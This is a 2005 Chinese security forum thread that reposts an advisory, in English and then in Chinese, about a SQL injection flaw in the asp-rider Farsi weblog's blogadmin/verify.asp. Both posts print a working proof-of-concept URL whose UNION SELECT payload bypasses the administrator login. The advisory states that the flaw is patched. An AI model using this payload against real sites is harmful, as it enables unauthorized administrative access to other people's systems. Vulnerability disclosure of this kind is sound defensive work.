‹‹ 上一主题 | 下一主题 ››
发新话题
打印

[转载]asp-rider SQL Injection漏洞

冰血封情

老林

团队决策人

Rank: 9Rank: 9Rank: 9

E.S.T运营责任人

帖子
6831 
精华
834 
积分
36069 
阅读权限
255 
性别
男 
来自
中国 
在线时间
599 小时 
注册时间
2004-6-25 
最后登录
2008-12-3 

优秀管理奖 资料收集奖 原创技术奖 核心建议奖

楼主 发表于 2005-1-1 02:42  只看该作者

[转载]asp-rider SQL Injection漏洞

信息来源:www.karchack.com

affected software decribtion :
asp-rider is a full farsi weblog written in asp
www.asp-rider.com

--------------------------------------
Vulnerabilities:
the file verify.asp in blogadmin folder is vulnerable to sql injection attack

-------------------------------------
proof of concept :
you can easily log in to the weblog administrator page by entering :
www.site.com/weblog/blogadmin/verify.asp?username='union select 1,1,1,1,1,1,1,1 from tbl_users where ''='&password=1



-------------------------------------
this vulnerability is already patched.
www.karchack.com
www.karchack.net
qq310926是我唯一用号,除此之外有其他号码号自称邪八冰血封情,则非本人。

TOP

haicao

技术核心组

Rank: 8Rank: 8

E.S.T核心成员 项目主管

帖子
429 
精华
24 
积分
5195 
阅读权限
200 
性别
男 
在线时间
164 小时 
注册时间
2004-10-5 
最后登录
2008-10-27 

软件研发奖 技术活跃奖 原创技术奖

沙发 发表于 2005-1-1 02:52  只看该作者
文章来源:
http://marc.theaimsgroup.com/l=b ... 05802005220&w=2

发布日期:
2004-12-14 21:00:20

受影响软件描述:
asp-rider是一个用asp写成的功能齐全的网络日志程序。
www.asp-rider.com

漏洞描述:
blogadmin目录下的verify.asp存在sql注入漏洞。

漏洞测试:

你可以输入以下url
www.site.com/weblog/blogadmin/verify.asp?username='union select 1,1,1,1,1,1,1,1 from \tbl_users where ''='&password=1
来登陆管理界面.

解决办法:
漏洞已被修补
在我纯真年少時,有一個女生,她願意爲我失去生命,她意志堅定地說:你再纏著我,我就去死! 在我負笈外地時,有一個女生,她願意等我到下輩子,她溫柔婉約地說:你想成爲我男友?等下輩子!! 在我窮困潦倒時,有一個女生,她願意與我共赴黃泉,她眨著紅眼說:你再不還錢,我和你同歸于盡!

TOP

‹‹ 上一主题 | 下一主题 ››
发新话题